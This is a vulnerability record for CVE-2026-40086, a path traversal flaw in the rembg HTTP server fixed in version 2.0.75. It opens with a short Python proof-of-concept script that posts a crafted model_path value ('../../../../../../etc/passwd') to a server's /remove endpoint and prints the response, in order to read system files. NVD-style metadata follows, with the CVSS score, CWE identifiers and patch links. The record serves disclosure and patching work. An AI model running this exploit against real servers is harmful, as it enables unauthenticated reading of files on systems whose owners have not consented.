CVE-2026-40086

import requests def exploit_rembg(target_url): """ PoC for CVE-2026-40086 Attempts to read a file using path traversal via model_path. """ # The endpoint might vary depending on server configuration endpoint = f"{target_url}/remove" # Path traversal payload to read /etc/passwd (Linux) or win.ini (Windows) # Adjust the number of '../' based on the deployment depth payload = { "model_path": "../../../../../../etc/passwd" } try: response = requests.post(endpoint, data=payload) # The error message often reveals the file content or existence if response.status_code == 200 or response.status_code == 500: print("[+] Request sent successfully.") print("[+] Response (Check for file content/errors):") print(response.text[:500]) except Exception as e: print(f"[-] Error during request: {e}") if __name__ == "__main__": target = "http://localhost:5000" # Replace with actual target exploit_rembg(target)

{"cve": {"id": "CVE-2026-40086", "sourceIdentifier": "[email protected]", "published": "2026-04-10T17:17:12.663", "lastModified": "2026-04-23T15:08:22.550", "vulnStatus": "Analyzed", "cveTags": [], "descriptions": [{"lang": "en", "value": "Rembg is a tool to remove images background. Prior to 2.0.75, a path traversal vulnerability in the rembg HTTP server allows unauthenticated remote attackers to read arbitrary files from the server's filesystem. By sending a crafted request with a malicious model_path parameter, an attacker can force the server to attempt loading any file as an ONNX model, revealing file existence, permissions, and potentially file contents through error messages. This vulnerability is fixed in 2.0.75."}], "metrics": {"cvssMetricV31": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:N/A:N", "baseScore": 5.3, "baseSeverity": "MEDIUM", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "NONE", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "LOW", "integrityImpact": "NONE", "availabilityImpact": "NONE"}, "exploitabilityScore": 3.9, "impactScore": 1.4}]}, "weaknesses": [{"source": "[email protected]", "type": "Primary", "description": [{"lang": "en", "value": "CWE-22"}, {"lang": "en", "value": "CWE-73"}]}], "configurations": [{"nodes": [{"operator": "OR", "negate": false, "cpeMatch": [{"vulnerable": true, "criteria": "cpe:2.3:a:danielgatis:rembg:*:*:*:*:*:*:*:*", "versionEndExcluding": "2.0.75", "matchCriteriaId": "E4344D3C-49F0-4B6F-94B4-7AEBDAA57C60"}]}]}], "references": [{"url": "https://github.com/danielgatis/rembg/commit/7c76d3cdc5757ffbda6a76664b24cfbecdb80273", "source": "[email protected]", "tags": ["Patch"]}, {"url": "https://github.com/danielgatis/rembg/releases/tag/v2.0.75", "source": "[email protected]", "tags": ["Product", "Release Notes"]}, {"url": "https://github.com/danielgatis/rembg/security/advisories/GHSA-3wqj-33cg-xc48", "source": "[email protected]", "tags": ["Exploit", "Mitigation", "Vendor Advisory"]}]}}